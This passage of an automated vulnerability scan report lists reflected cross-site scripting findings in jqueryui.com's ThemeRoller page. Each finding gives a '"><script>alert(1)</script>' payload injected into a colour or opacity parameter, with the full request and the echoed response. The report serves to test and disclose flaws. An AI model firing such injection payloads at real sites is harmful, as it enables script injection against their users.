adow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9b9ef1"><script>alert(1)</script>786f28ee864&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55
...[SNIP]...

1.72. http://jqueryui.com/themeroller/ [bgColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 856ba"><script>alert(1)</script>7e0ede96139 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd856ba"><script>alert(1)</script>7e0ede96139&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd856ba"><script>alert(1)</script>7e0ede96139&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85
...[SNIP]...

1.73. http://jqueryui.com/themeroller/ [bgColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e46f4"><script>alert(1)</script>78f02d202ae was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffce46f4"><script>alert(1)</script>78f02d202ae&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffce46f4"><script>alert(1)</script>78f02d202ae&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

1.74. http://jqueryui.com/themeroller/ [bgColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83359"><script>alert(1)</script>3f46f89bf75 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83359"><script>alert(1)</script>3f46f89bf75&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec83359"><script>alert(1)</script>3f46f89bf75&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

1.75. http://jqueryui.com/themeroller/ [bgColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa0a"><script>alert(1)</script>e0141161bf4 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9cccbfa0a"><script>alert(1)</script>e0141161bf4&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9cccbfa0a"><script>alert(1)</script>e0141161bf4&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100
...[SNIP]...

1.76. http://jqueryui.com/themeroller/ [bgColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af7c6"><script>alert(1)</script>598ca42c4f5 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88af7c6"><script>alert(1)</script>598ca42c4f5&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88af7c6"><script>alert(1)</script>598ca42c4f5&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&bo
...[SNIP]...

1.77. http://jqueryui.com/themeroller/ [bgColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b6e"><script>alert(1)</script>26a180bd0fb was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f547b6e"><script>alert(1)</script>26a180bd0fb&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f547b6e"><script>alert(1)</script>26a180bd0fb&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorA
...[SNIP]...

1.78. http://jqueryui.com/themeroller/ [bgColorOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d15a0"><script>alert(1)</script>217cbbbdb46 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad15a0"><script>alert(1)</script>217cbbbdb46&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
d42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad15a0"><script>alert(1)</script>217cbbbdb46&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

1.79. http://jqueryui.com/themeroller/ [bgColorShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 269fe"><script>alert(1)</script>439a3d5399f was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa269fe"><script>alert(1)</script>439a3d5399f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa269fe"><script>alert(1)</script>439a3d5399f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.80. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9dc2"><script>alert(1)</script>12595aecc6f was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d9dc2"><script>alert(1)</script>12595aecc6f&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:47 GMT
Content-Type: text/html
Connection: close
